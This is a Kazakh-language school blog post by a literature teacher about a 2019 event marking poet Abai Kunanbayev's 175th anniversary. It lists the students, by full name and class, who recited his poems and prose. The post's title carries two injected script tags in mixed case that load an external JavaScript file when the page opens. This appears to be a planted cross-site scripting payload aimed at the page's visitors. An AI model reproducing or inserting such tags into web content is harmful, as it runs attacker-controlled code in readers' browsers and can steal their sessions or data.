«Адамзаттың Абайы»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.09.2019

Бүгін Макин орта мектебінде Тілдер апталығына орай, қазақтың ұлы ақыны Абай Құнанбаевтың туғанына 175 жыл толуына «Адамзаттың Абайы» атты әдеби іс-шара өткіздім. Іс-шараға 5-11 қазақ сыныптарының оқушылары белсене қатысты. Абайға арналған кітап көрмесі мен жазушылардың Абай  туралы айтқан нақыл сөздері латын тілінде жазылып, әртүрлі қосымша материалдармен, шарлармен сынып безендіріліп, ерекше көңіл-күйді көтерді.  5 «А»-сынып оқушылары Сәкен Әділ, Ержанұлы Ерасыл, Жұмахан Аяулым, 6«А»-сынып оқушысы Омар Жанасыл, 9«А»-сынып оқушысы Балтинова Жанель Абайдың өлеңдерін қазақ тілінде, 9«А»-сынып оқушысы Қасымова Аяжан мен 10«А»-сынып оқушысы Тастенбекова Сабина орысшаға аударылған өлеңдерін оқыды. Сонымен бірге, 10«А»-сынып оқушысы Ташимова Жасмин «Көзімнің қарасы» әнін ағылшынша, 10«А»-сынып қыздары осы әнді қазақша айтып өтті. Аяжан «Күз» өлеңін ағылшынша мәнерлеп оқыды.  Абайдың «Желсіз түнде жарық ай» әнін  6 «А»-сынып оқушысы Абжанова Меруерт , «Айттым сәлем қаламқас» әнін Кенжебек Айғаным нақышына келтіре орындап берді. Абайдың 45-қарасөзі бар екені бәрімізге мәлім, сондықтан оқушылар қарасөздерін де мәнерлеп айта білді. 9«А»-сынып оқушысы Қасымова Аяжан 16-қарасөзін, 10«А»-сынып оқушысы Орал Дильназ 19-қарасөзін, 5 «А»-сынып оқушысы Маратұлы Саян 31-қарасөзін жатқа айтып берді  және Жасантегі Мәулет, Кенжебек Айғаным, Езова София, Ұланов Расул Абайдың  17-қарасөзінен сахналық көрініс көрсете білді. Жасантегі Раббия «Татьянаның Онегинге жазған хаты» аудармасын көрініс ретінде қойып, әсерлі орындап берді. Абайдың поэмалары  туралы сөз болып, Стаматова Виктория «Ескендір» поэмасын орындады.  Іс-шара барысында Абайдың өмірі мен шығармашылығы, әндері туралы бейнефильмдер көрсетілді.  Іс-шараның соңында оқушыларға латынша жазылған Абай жайлы нақыл сөздерді оқып беруге тапсырма берілді, 5-6-сынып оқушылары құлшыныспен оқып, авторларын анықтады. Өткізілген іс-шараға келген мектеп директорының міндетін атқарушы  Рахимжанов Толыбай Сапарович  және басқа да мұғалімдер өз пікірлерімен бөлісіп, оқушыларға ақ тілектерін айтты. Оқушылардың барлығы мүмкіндігінше ұлттық киімдер киді. Іс-шара жоғары деңгейде өткізілді. Алдағы уақытта ақын-Абай, дара- Абай, дана-Абай туралы басқа да жұмыстар жүргізілетін болады.    

Қазақ тілі мен әдебиеті пәнінің мұғалімі Абжанова Мансия Сабикеновна. 
Просмотров: 865


Пікір қосу



Деректерді қолтаңбаға қосу